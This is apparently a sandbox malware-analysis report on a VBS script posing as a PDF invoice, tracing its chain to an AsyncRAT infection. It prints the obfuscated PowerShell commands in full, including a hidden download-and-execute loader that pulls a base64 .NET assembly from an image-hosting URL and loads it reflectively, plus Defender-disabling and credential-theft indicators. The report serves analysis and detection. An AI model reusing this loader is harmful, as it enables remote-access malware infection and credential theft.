TreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_02EA5510	18_2_02EA5510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_02EABBD8	18_2_02EABBD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_02EAAE98	18_2_02EAAE98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_02EA5DE0	18_2_02EA5DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_02EA51C8	18_2_02EA51C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_02EA81D8	18_2_02EA81D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_02EAF668	18_2_02EAF668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_02EAF63F	18_2_02EAF63F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_02EA0BA0	18_2_02EA0BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_07415718	18_2_07415718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_0741ED60	18_2_0741ED60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_0741A278	18_2_0741A278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_0741B711	18_2_0741B711
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_0741B720	18_2_0741B720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_0741D6C3	18_2_0741D6C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_07417EC8	18_2_07417EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_0741D6D0	18_2_0741D6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_07417EB8	18_2_07417EB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_0741ED50	18_2_0741ED50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_074175C8	18_2_074175C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_07415CCF	18_2_07415CCF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_07415CE0	18_2_07415CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_0741ECE9	18_2_0741ECE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 18_2_0741A26E	18_2_0741A26E

Source: Factura.PDF______________________________________.vbs

Initial sample: Strings found which are bigger than 50

Source: 18.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 18.2.MSBuild.exe.6c30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 18.2.MSBuild.exe.6c30000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 18.2.MSBuild.exe.71f0000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 18.2.MSBuild.exe.71f0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000012.00000002.2491457126.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000012.00000002.2549068549.0000000006C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 00000012.00000002.2549242088.00000000071F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 18.2.MSBuild.exe.6c30000.1.raw.unpack, Botkiller.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 18.2.MSBuild.exe.6c30000.1.raw.unpack, Botkiller.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 18.2.MSBuild.exe.6c30000.1.raw.unpack, Helper.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 18.2.MSBuild.exe.6c30000.1.raw.unpack, Helper.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winVBS@10/22@4/4

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\thAhY[1].txt

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\JxfYmBE6u9bELdp4
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5z25d1o2.jk3.ps1

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura.PDF______________________________________.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: tmpBC72.tmp.dat.18.dr, tmp1BFB.tmp.dat.18.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Factura.PDF______________________________________.vbs

Virustotal: Detection: 11%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Factura.PDF______________________________________.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.jhg/moc.ur.wsakodmob//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.jhg/moc.ur.wsakodmob//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: adsnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wkscli.dll	Jump to behavior
